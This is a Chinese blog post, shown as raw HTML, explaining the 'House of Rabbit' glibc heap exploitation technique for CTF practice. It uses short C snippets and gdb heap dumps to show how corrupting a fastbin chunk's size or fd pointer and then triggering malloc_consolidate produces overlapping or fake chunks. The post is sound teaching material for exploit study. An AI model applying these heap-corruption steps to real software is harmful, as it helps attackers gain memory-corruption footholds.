
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>House of Rabbit - gravity的个人博客</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="GraVity0,"> 
    <meta name="description" content="介绍：House of rabbit是一种伪造堆块的技术，早在2017年已经提出，但在最近两个月才在CTF比赛中出现。我们一般运用在fastbin attack中，因为unsorted bin等其它,"> 
    <meta name="author" content="yuntao you"> 
    <link rel="alternative" href="atom.xml" title="gravity的个人博客" type="application/atom+xml"> 
    <link rel="icon" href="/img/first.jpg"> 
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <link rel="stylesheet" href="/css/diaspora.css">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
</head>
</html>
<body class="loading">
    <span id="config-title" style="display:none">gravity的个人博客</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://yoursite.com"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">House of Rabbit</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class="main">
        <h1 class="title">House of Rabbit</h1>
        <div class="stuff">
            <span>十月 01, 2019</span>
            

        </div>
        <div class="content markdown">
            <h5 id="介绍："><a href="#介绍：" class="headerlink" title="介绍："></a>介绍：</h5><p>House of rabbit是一种伪造堆块的技术，早在2017年已经提出，但在最近两个月才在CTF比赛中出现。我们一般运用在fastbin attack中，因为unsorted bin等其它的bin有更好的利用手段。         </p>
<h5 id="原理："><a href="#原理：" class="headerlink" title="原理："></a>原理：</h5><p>我们知道，fastbin中会把相同的size的被释放的堆块用一个单向链表管理，分配的时候会检查size是否合理，如果不合理程序就会异常退出。而house of rabbit就利用了在malloc consolidate的时候fastbin中的堆块进行合并时size没有进行检查从而伪造一个假的堆块，为进一步的利用做准备。<br>前提条件：        </p>
<ul>
<li>1.可以修改fastbin的fd指针或size   </li>
<li>2.可以触发malloc consolidate(merge top或malloc big chunk等等)。<br>malloc一个很大的块，就会暂时申请一个large chunk来满足请求，再分配large chunk时会调用malloc consolidate()函数，就会使得fastbin中的chunk合并。<br>该利用方式的发现者提供了两中利用方式：<br>一、修改fastbin块的大小        <pre><code class="cpp">unsigned long* chunk1=malloc(0x40); //0x602000
unsigned long* chunk2=malloc(0x40); //0x602050
malloc(0x10);
free(chunk1);
free(chunk2);
</code></pre>
可以查看一下现在堆的情况：     <pre><code class="cpp">Heap layout
0000| 0x602000 --&gt; 0x0 
0008| 0x602008 --&gt; 0x51 (&#39;Q&#39;)
0016| 0x602010 --&gt; 0x0 
..... 
0080| 0x602050 --&gt; 0x0 
0088| 0x602058 --&gt; 0x51 (&#39;Q&#39;)
0096| 0x602060 --&gt; 0x602000 --&gt; 0x0 
0104| 0x602068 --&gt; 0x0 
...... 
0160| 0x6020a0 --&gt; 0x0 
0168| 0x6020a8 --&gt; 0x21 (&#39;!&#39;)
0176| 0x6020b0 --&gt; 0x0 
0184| 0x6020b8 --&gt; 0x0 
</code></pre>
<pre><code class="cpp">chunk1[-1]=0xa1; //modify chunk1 size to be 0xa1
malloc(0x1000);  //allocate a large chunk, trigger malloc consolidate
//Chunk1 overlap with chunk2 now
</code></pre>
<pre><code class="cpp">gdb-peda$ telescope 0x602000 100
0000| 0x602000 --&gt; 0x0 
0008| 0x602008 --&gt; 0xa1 
0016| 0x602010 --&gt; 0x7ffff7dd1c08 --&gt; 0x7ffff7dd1bf8 --&gt; 0x7ffff7dd1be8 --&gt; 0x7ffff7dd1bd8 --&gt; 0x7ffff7dd1bc8 (--&gt; ...)
0024| 0x602018 --&gt; 0x7ffff7dd1c08 --&gt; 0x7ffff7dd1bf8 --&gt; 0x7ffff7dd1be8 --&gt; 0x7ffff7dd1bd8 --&gt; 0x7ffff7dd1bc8 (--&gt; ...)
0032| 0x602020 --&gt; 0x0 
.....
0080| 0x602050 --&gt; 0x0 
0088| 0x602058 --&gt; 0x51 (&#39;Q&#39;)
0096| 0x602060 --&gt; 0x7ffff7dd1bb8 --&gt; 0x7ffff7dd1ba8 --&gt; 0x7ffff7dd1b98 --&gt; 0x7ffff7dd1b88 --&gt; 0x7ffff7dd1b78 (--&gt; ...)
0104| 0x602068 --&gt; 0x7ffff7dd1bb8 --&gt; 0x7ffff7dd1ba8 --&gt; 0x7ffff7dd1b98 --&gt; 0x7ffff7dd1b88 --&gt; 0x7ffff7dd1b78 (--&gt; ...)
0112| 0x602070 --&gt; 0x0 
0120| 0x602078 --&gt; 0x0 
....
0152| 0x602098 --&gt; 0x0 
0160| 0x6020a0 --&gt; 0xa0 
0168| 0x6020a8 --&gt; 0x20 (&#39; &#39;)
</code></pre>
<pre><code class="cpp">gdb-peda$ heapinfo
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                top: 0x603450 (size : 0x1fbb0) 
     last_remainder: 0x0 (size : 0x0) 
          unsortbin: 0x0
(0x050)  smallbin[ 3]: 0x602050
(0x0a0)  smallbin[ 8]: 0x602000 (overlap chunk with 0x602050(freed) )
</code></pre>
以上是第一种。<br>二、修改FD指针：<br><code>`</code> cpp<br>unsigned long<em> chunk1=malloc(0x40); //0x602000<br>unsigned long</em> chunk2=malloc(0x100);//0x602050</li>
</ul>
<p>chunk2[1]=0x31; //fake chunk size 0x30<br>chunk2[7]=0x21  //fake chunk’s next chunk<br>chunk2[11]=0x21 //fake chunk’s next chunk’s next chuck</p>
<pre><code>查看此时堆的情况：       
``` cpp
Heap laylout
0000| 0x602000 --&gt; 0x0 
0008| 0x602008 --&gt; 0x51 (&#39;Q&#39;)
0016| 0x602010 --&gt; 0x0 
......
0080| 0x602050 --&gt; 0x0 
0088| 0x602058 --&gt; 0x111 
0096| 0x602060 --&gt; 0x0 
0104| 0x602068 --&gt; 0x31 (&#39;1&#39;)
0112| 0x602070 --&gt; 0x0 
......
0144| 0x602090 --&gt; 0x0 
0152| 0x602098 --&gt; 0x21 (&#39;!&#39;)
0160| 0x6020a0 --&gt; 0x0 
0168| 0x6020a8 --&gt; 0x0 
0176| 0x6020b0 --&gt; 0x0 
0184| 0x6020b8 --&gt; 0x21 (&#39;!&#39;)
0192| 0x6020c0 --&gt; 0x0 
......
0352| 0x602160 --&gt; 0x0 
0360| 0x602168 --&gt; 0x20ea1
</code></pre><pre><code class="cpp">free(chunk1);
chuck1[0]=0x602060;// modify the fd of chunk1
</code></pre>
<p>此时的堆信息：   </p>
<pre><code class="cpp">gdb-peda$ heapinfo
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x602000 --&gt; 0x602060 (size error (0x30)) --&gt; 0x0
</code></pre>
<pre><code class="cpp">malloc(5000);// malloc a  big chunk to trigger malloc consolidate
</code></pre>
<pre><code class="cpp">(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6034f0 (size : 0x1fb10) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
(0x050)  smallbin[ 3]: 0x602000
(0x030)  smallbin[ 1]: 0x602060
</code></pre>
<p>原理很简单，就是通过修改fastbin chunk的size直接构造overlap chunk，或者修改fd，让它指向一个fake chunk，触发malloc consolidate之后让这个fake chunk成为一个合法的chunk。<br>House of rabbit的优点是容易构造overlap chunk，由于可以基于fastbin attack，甚至不需要leak就可以完成攻击。大家可以通过例题的练习加深对这个攻击的理解。          </p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://link.hhtjim.com/163/5146554.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://link.hhtjim.com/qq/001faIUs4M2zna.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link" data-ae="false" data-ci="" data-cs="" data-r="" data-o="" data-a="" data-d="false">查看评论</div>


    </div>
    
</div>


    </div>
</div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/nito.model.json"},"display":{"position":"lift","width":200,"height":350},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">
<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
